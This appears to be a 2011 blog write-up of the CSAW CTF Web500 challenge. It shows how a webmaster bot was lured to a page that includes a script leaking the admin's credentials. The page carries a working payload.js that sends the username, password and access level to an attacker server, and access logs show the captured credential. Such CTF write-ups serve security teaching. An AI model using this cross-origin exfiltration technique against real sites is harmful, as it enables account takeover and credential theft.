Monthly Archives: October 2011

CSAW CTF Write-up : Web500 (CrackJack)

Better late than never.

The solution

If you look at the site's AJAX calls, you will find an interesting URL that sends back the plaintext password of the logged-in user: http://csawstf.poly.edu:40004/challenge2/json/getcurrent.js. This page returns something like this:

var current = {"access":"1","username":"haxor","password":"abc123"}

The contact page hinted that you can send a URL to the webmaster and that he (or it) will click on it. The field was labelled "Your message or website" and the page included a warning saying "Just don't send me anything that might get me hacked!". Right. Let's do just that. We sent a URL and got a hit from their end a couple of minutes later.

128.238.66.100 - - [25/Sep/2011:20:02:15 +0400] "GET /csaw HTTP/1.1" 404 263 "-" "Mozilla/5.0 (compatible; Konqueror/4.6; Linux) KHTML/4.6.2 (like Gecko) Kubuntu"

Can we get this guy/robot to execute JavaScript? The answer is yes. We are lucky: the response is not JSON but a plain JavaScript assignment, so any page that includes it with a <script src> tag gets the object defined as window.current and can read it. Script tags are not bound by the same-origin policy, and the browser sends the webmaster's own session cookie along with the request, so the included page sees the webmaster's record, not ours.

Our first attempt was to include getcurrent.js with the URL http://csawstf.poly.edu:40004/challenge2/json/getcurrent.js, but this failed, probably because csawstf.poly.edu resolves to an internal IP address on their end and the NAT translation fails from inside. The admin instead uses the private IP (192.168.4.4, later given as a hint on the mailing list) or the public IP directly. From inside, these two addresses gave up the admin account's password:

  • http://128.238.66.100:40004/challenge2/json/getcurrent.js
  • http://192.168.4.4/challenge2/json/getcurrent.js

We sent an http URL pointing to the following HTML file:

<html>
<head>
  <meta http-equiv="Content-type" content="text/html; charset=utf-8">
  <title>My Page</title>
  <script src="http://128.238.66.100:40004/challenge2/json/getcurrent.js"></script>
  <script src="http://our_server/payload.js"></script>
</head>
<body>
  Lots of pictures of cats...
</body>
</html>

With this JavaScript:

// payload.js
// getcurrent.js was included by our page before this script, so if the
// cross-origin include succeeded, "current" is a global holding the
// webmaster's own record.
var xmlhttp=new XMLHttpRequest();
if(typeof(current) != "undefined") {
  // Exfiltrate the record in the query string. We only need the request to
  // reach our access log, so it does not matter that the browser will not let
  // us read the cross-origin response.
  xmlhttp.open("GET","http://our_server/csaw?" + current.username + "--" + current.password + "--" + current.access, true);
}
else {
  // Report that the include failed (wrong host, or no session) rather than
  // staying silent, so we can tell a bad URL from a bot that never came.
  xmlhttp.open("GET","http://our_server/csaw?missed",true);
}
xmlhttp.send();

This got us the following hit in our log:

128.238.66.100 - - [25/Sep/2011:20:20:35 +0400] "GET /csaw?administrator--2d8a579d4d4bbd98399f47df0d6c8fd0be22e3a8--1000 HTTP/1.1" 404 263 "-" "Mozilla/5.0 (compatible; Konqueror/4.6; Linux) KHTML/4.6.2 (like Gecko) Kubuntu"

We logged in with administrator and 2d8a579d4d4bbd98399f47df0d6c8fd0be22e3a8 as the password and got the key on the main page.

Things that didn’t work

We tried sending a javascript: URL, but it didn't work. For example, javascript:window.location="http://our_server/a"+"b" produced a hit for http://our_server/a"+"b in our log, so the bot never evaluated the javascript: URL; it probably pulls the link out of the message with a regex that starts matching at http.

For some reason, putting the JavaScript inline in the HTML didn't work for us. But maybe we just had a syntax error.

Sending lots of pictures of cats didn't help. An animated GIF was not the solution.

Saturday night and Sunday morning, the queue to get our link visited was very long. Once the link was sent, it took between 30 minutes and an hour to get a hit back. Whoever filled the queue, that wasn't nice.

The extras

The source code was available at http://csawctf.poly.edu:40004/challenge2/dev. Here is a copy of the archive. He found this using our favourite dead file scanner, Tachyon.